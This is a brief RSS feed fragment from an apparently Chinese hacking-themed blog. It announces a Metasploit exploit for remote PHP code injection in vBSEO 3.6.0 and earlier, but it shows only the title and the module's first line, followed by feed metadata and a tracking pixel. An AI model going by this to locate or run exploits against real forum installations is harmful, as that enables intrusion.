id=fp><strong>vBSEO&nbsp;&lt;=&nbsp;3.6.0&nbsp;&quot;proc_deutf()&quot;&nbsp;Remote&nbsp;PHP&nbsp;Code&nbsp;Injection&nbsp;Exploit</strong><br><br><br>require&nbsp;&#39;&#39;msf/core&#39;&#39;&nbsp;<br></p><img src="http://www1.feedsky.com/t1/603220394/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1798" border="0" height="0" width="0" style="position:absolute" />黑客攻防Tue, 14 Feb 2012 12:22:39 +0800kawenhttp://www.cnyzy.cn/blogview.asp?logID=1798#commenthttp://www.cnyzy.cn/blogview.asp?logID=1798kawenhttp://www.cnyzy.cn/blogview.asp?logID=1798http://www.cnyzy.cn/blogfeed.aspfeedsky/cnyzy/~1471012/603220394/1477126